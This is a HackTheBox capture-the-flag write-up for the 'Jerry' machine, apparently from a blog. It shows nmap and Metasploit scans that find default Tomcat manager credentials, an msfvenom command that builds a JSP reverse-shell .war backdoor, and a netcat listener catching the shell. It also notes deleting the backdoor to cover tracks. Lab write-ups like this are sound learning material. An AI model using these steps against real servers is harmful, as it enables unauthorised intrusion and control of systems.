One Eyed Techs WHOIS


HackTheBox: jerry by mrh4sh

As usual, we'll start off by scanning the machine.

root@kali:~# nmap -sV -sC -Pn
Starting Nmap 7.70 ( ) at 2018-09-12 06:10 EDT
Nmap scan report for
Host is up (0.041s latency).
Not shown: 999 filtered ports
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at
Nmap done: 1 IP address (1 host up) scanned in 23.28 seconds

Service detection performed. Please report any incorrect results at
Nmap done: 1 IP address (1 host up) scanned in 18.35 seconds

Tomcat 7.0.88 is open on port 8080. Going to, returns the default Apache Tomcat startpage.

Tomcat default

Let's scan the /manager/html for default logins through the metasploit framework. (Yes, I'm aware that it's also displayed on the 401 unauthorized access site)

root@kali:~# msfconsole
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts
msf auxiliary(scanner/http/tomcat_mgr_login) > run

The auxiliary returns as positive, for a single default login. tomcat:s3cret.

Tomcat default login

This login gives us access to Tomcat Web Application Manager on and allows us to deploy .war files. Or even better, a malicious .war backdoor file. ˙ ͜ʟ˙

Let's try out with a .war backdoor first. I'll use msfvenom to create the payload, and output it to the Desktop.

root@kali:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=4444 -f war > reverse.war
Payload size: 1085 bytes
Final size of war file: 1085 bytes

There are multiple ways to do this. Another way is through metasploit. However, it's more fun doing it manually ;-). Let's upload the backdoor through the Web Application Manager and listen to anything on port 4444 with netcat.

Backdoor war
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...

The backdoor is now displayed as a running application.

Backdoor war running

When entering, the reverse shell opens in netcat.

root@kali:~# nc -lvp 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 49208
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


After the reverse shell opening, we can delete our malicious .war backdoor to (somewhat) cover our tracks, and keep the connection open.

After searching for a bit, I found a file located in C:\Users\Administrator\Desktop\flags called "2 for the price of one.txt". Displaying the contents gives us both user and root flag.

C:\apache-tomcat-7.0.88>cd \Users\Administrator\Desktop\flags
cd \Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>type *
type *


This box got critisized for it's easiness, unstableness and non existing privilige escalation. I found it enjoyable and fun to do. I learned from it, which is what I care for.